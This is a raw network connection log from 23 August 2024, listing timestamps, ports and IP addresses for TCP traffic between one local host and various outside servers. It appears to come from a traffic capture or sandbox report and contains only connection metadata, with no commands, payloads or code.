Aug 23, 2024 18:43:35.095577002 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:35.095603943 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:35.095673084 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:35.095957994 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:35.095973015 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:35.103714943 CEST	80	59528	162.255.119.102	192.168.2.5
Aug 23, 2024 18:43:35.103902102 CEST	59528	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:35.104310989 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.109770060 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.109828949 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.109915018 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.111985922 CEST	80	59538	69.162.80.57	192.168.2.5
Aug 23, 2024 18:43:35.112054110 CEST	59538	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:43:35.112082005 CEST	59538	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:43:35.112246990 CEST	80	59538	69.162.80.57	192.168.2.5
Aug 23, 2024 18:43:35.112723112 CEST	59538	80	192.168.2.5	69.162.80.57
Aug 23, 2024 18:43:35.114706039 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.117420912 CEST	80	59538	69.162.80.57	192.168.2.5
Aug 23, 2024 18:43:35.124033928 CEST	59541	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:35.128823996 CEST	80	59541	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:35.128921986 CEST	59541	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:35.129010916 CEST	59541	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:35.134759903 CEST	80	59541	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:35.179580927 CEST	80	59537	208.100.26.245	192.168.2.5
Aug 23, 2024 18:43:35.179647923 CEST	59537	80	192.168.2.5	208.100.26.245
Aug 23, 2024 18:43:35.200848103 CEST	80	59529	3.64.163.50	192.168.2.5
Aug 23, 2024 18:43:35.200911045 CEST	59529	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:43:35.282463074 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:35.564105034 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:35.564198971 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:35.567784071 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:35.567795038 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:35.568039894 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:35.568088055 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:35.574405909 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:35.616504908 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:35.779875994 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.779906988 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.779925108 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.779942036 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.779958963 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.779967070 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.779982090 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.779999018 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.780009031 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.780015945 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.780018091 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.780041933 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.780060053 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.780060053 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.780076027 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.780106068 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.780114889 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.784924984 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.784985065 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.785011053 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.785049915 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877373934 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877392054 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877408028 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877424002 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877429008 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877435923 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877445936 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877456903 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877482891 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877491951 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877595901 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877625942 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877636909 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877640963 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877659082 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877681971 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877712011 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.877805948 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.877846956 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:35.883141041 CEST	80	59540	91.195.240.19	192.168.2.5
Aug 23, 2024 18:43:35.883207083 CEST	59540	80	192.168.2.5	91.195.240.19
Aug 23, 2024 18:43:36.277481079 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.277610064 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.277673960 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.277694941 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.277800083 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.277848005 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.277857065 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.277895927 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.277901888 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278012991 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278064013 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.278072119 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278162956 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278228045 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.278234959 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278281927 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.278290033 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278542042 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.278548002 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278845072 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.278865099 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.278918982 CEST	443	59539	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.278945923 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.278970957 CEST	59539	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.280062914 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.288969994 CEST	80	59530	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.336677074 CEST	80	59534	199.191.50.83	192.168.2.5
Aug 23, 2024 18:43:36.336823940 CEST	59534	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:43:36.485789061 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:36.559957981 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:36.564910889 CEST	80	59542	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:36.567315102 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:36.568149090 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:36.573961973 CEST	80	59542	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:36.636260986 CEST	80	59530	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.643117905 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.721921921 CEST	80	59530	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.723690033 CEST	59530	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.760883093 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.760905027 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.761013031 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.761424065 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:36.761435032 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:36.774557114 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:36.774559975 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:36.779382944 CEST	80	59544	154.212.231.82	192.168.2.5
Aug 23, 2024 18:43:36.779716015 CEST	80	49719	154.212.231.82	192.168.2.5
Aug 23, 2024 18:43:36.779831886 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:36.780541897 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:36.786916971 CEST	80	59544	154.212.231.82	192.168.2.5
Aug 23, 2024 18:43:36.831239939 CEST	80	59541	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:36.838567019 CEST	59541	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:36.843312979 CEST	59541	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:36.849430084 CEST	80	59541	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:36.854773045 CEST	59545	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:36.860341072 CEST	80	59545	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:36.863123894 CEST	59545	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:36.873982906 CEST	59545	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:36.878815889 CEST	80	59545	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:37.032530069 CEST	80	59542	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:37.032557011 CEST	80	59542	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:37.032618046 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:37.032655954 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:37.032656908 CEST	80	59542	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:37.032705069 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:37.034661055 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:37.034661055 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:37.039629936 CEST	80	59542	199.59.243.226	192.168.2.5
Aug 23, 2024 18:43:37.039763927 CEST	59542	80	192.168.2.5	199.59.243.226
Aug 23, 2024 18:43:37.244950056 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.245068073 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.246639967 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.246649981 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.246879101 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.247118950 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.247314930 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.292500973 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.767007113 CEST	80	59544	154.212.231.82	192.168.2.5
Aug 23, 2024 18:43:37.767066956 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:37.768205881 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:37.773156881 CEST	80	59544	154.212.231.82	192.168.2.5
Aug 23, 2024 18:43:37.886734009 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.886857033 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.886868954 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.886899948 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.886926889 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.886966944 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.887001038 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.887053967 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.887109995 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.887167931 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.887191057 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.887237072 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.887276888 CEST	443	59543	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:37.887293100 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.887324095 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:37.888223886 CEST	59543	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:38.160063982 CEST	80	59544	154.212.231.82	192.168.2.5
Aug 23, 2024 18:43:38.160164118 CEST	59544	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:43:38.456063986 CEST	80	59545	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:38.456170082 CEST	59545	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:38.456244946 CEST	59545	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:43:38.461879969 CEST	80	59545	85.17.31.122	192.168.2.5
Aug 23, 2024 18:43:38.891846895 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:42.376595974 CEST	59531	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:42.377907038 CEST	59546	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:42.389916897 CEST	80	59546	172.234.222.143	192.168.2.5
Aug 23, 2024 18:43:42.390017986 CEST	59546	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:42.390125990 CEST	59546	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:42.399487972 CEST	80	59546	172.234.222.143	192.168.2.5
Aug 23, 2024 18:43:43.704441071 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:45.947457075 CEST	80	59546	172.234.222.143	192.168.2.5
Aug 23, 2024 18:43:45.947599888 CEST	59546	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:45.951201916 CEST	59546	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:43:45.956029892 CEST	80	59546	172.234.222.143	192.168.2.5
Aug 23, 2024 18:43:46.002648115 CEST	59547	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:43:46.009584904 CEST	80	59547	13.248.169.48	192.168.2.5
Aug 23, 2024 18:43:46.009666920 CEST	59547	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:43:46.009900093 CEST	59547	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:43:46.015254021 CEST	80	59547	13.248.169.48	192.168.2.5
Aug 23, 2024 18:43:46.027479887 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:46.027769089 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:46.032716990 CEST	80	50842	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:46.032813072 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:46.033014059 CEST	80	49730	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:46.033077002 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:46.033679962 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:46.038728952 CEST	80	50842	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:46.208890915 CEST	50843	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:46.214147091 CEST	80	50843	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:46.214211941 CEST	50843	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:46.214344978 CEST	50843	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:46.219214916 CEST	80	50843	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:46.273832083 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:46.274127007 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:46.278702974 CEST	80	49733	103.150.11.230	192.168.2.5
Aug 23, 2024 18:43:46.279069901 CEST	80	50844	103.150.11.230	192.168.2.5
Aug 23, 2024 18:43:46.279146910 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:46.279321909 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:46.284219980 CEST	80	50844	103.150.11.230	192.168.2.5
Aug 23, 2024 18:43:46.683646917 CEST	80	50843	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:46.683669090 CEST	80	50843	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:46.683785915 CEST	50843	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:46.692895889 CEST	50843	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:43:46.697772980 CEST	80	50843	18.208.156.248	192.168.2.5
Aug 23, 2024 18:43:47.171315908 CEST	80	50844	103.150.11.230	192.168.2.5
Aug 23, 2024 18:43:47.172571898 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:47.191440105 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:47.196329117 CEST	8001	50845	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:47.196403027 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:47.198504925 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:47.206729889 CEST	8001	50845	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:47.523147106 CEST	80	50842	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:47.523222923 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:47.528271914 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:47.528322935 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:47.528383970 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:47.528642893 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:47.528656006 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:47.998436928 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:47.998558044 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:48.000873089 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:48.000886917 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:48.001174927 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:48.001261950 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:48.001976013 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:48.048501968 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:48.279145002 CEST	8001	50845	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:48.279212952 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.279326916 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.279357910 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.279756069 CEST	8001	50845	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:48.279799938 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.280520916 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:48.284071922 CEST	8001	50845	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:48.284126043 CEST	50845	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.285479069 CEST	80	50844	103.150.11.230	192.168.2.5
Aug 23, 2024 18:43:48.599822044 CEST	80	50844	103.150.11.230	192.168.2.5
Aug 23, 2024 18:43:48.600215912 CEST	50844	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:43:48.601427078 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.606416941 CEST	8001	50847	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:48.608753920 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.608925104 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:48.613801956 CEST	8001	50847	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:49.688838005 CEST	8001	50847	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:49.688985109 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:49.689594984 CEST	8001	50847	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:49.689656973 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:49.748003006 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:49.748034954 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:49.752851009 CEST	8001	50847	106.15.137.66	192.168.2.5
Aug 23, 2024 18:43:49.752969027 CEST	50847	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:43:49.912782907 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.912847996 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.912882090 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.912914038 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.912928104 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.912947893 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.912955999 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.912998915 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.913007975 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.913043976 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.913048983 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.913083076 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.913093090 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.913125038 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.913130999 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.913163900 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.913171053 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.913203955 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.913208961 CEST	443	50846	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:49.913239002 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.915631056 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.915674925 CEST	50846	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.930955887 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:49.936100006 CEST	80	50842	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:50.103533983 CEST	80	59528	162.255.119.102	192.168.2.5
Aug 23, 2024 18:43:50.103606939 CEST	59528	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:50.959286928 CEST	80	50842	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:50.959352970 CEST	50842	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:50.964230061 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:50.964270115 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:50.964339972 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:50.964673996 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:50.964688063 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:51.424247980 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:51.424345970 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:51.439274073 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:51.439297915 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:51.439662933 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:51.439722061 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:51.440538883 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:51.488502026 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:53.252460957 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:53.252509117 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:53.252542019 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:53.252569914 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:53.252578974 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:53.252609968 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:53.252624989 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:53.252645969 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:53.252650976 CEST	443	50848	188.114.96.3	192.168.2.5
Aug 23, 2024 18:43:53.252692938 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:53.252866030 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:53.252882004 CEST	50848	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:43:53.313714027 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:43:54.017141104 CEST	59547	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:43:54.019448996 CEST	50849	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:43:54.024246931 CEST	80	50849	13.248.169.48	192.168.2.5
Aug 23, 2024 18:43:54.024369001 CEST	50849	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:43:54.024509907 CEST	50849	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:43:54.029648066 CEST	80	50849	13.248.169.48	192.168.2.5
Aug 23, 2024 18:44:01.808098078 CEST	62684	80	192.168.2.5	64.225.91.73
Aug 23, 2024 18:44:01.808154106 CEST	63525	80	192.168.2.5	64.190.63.136
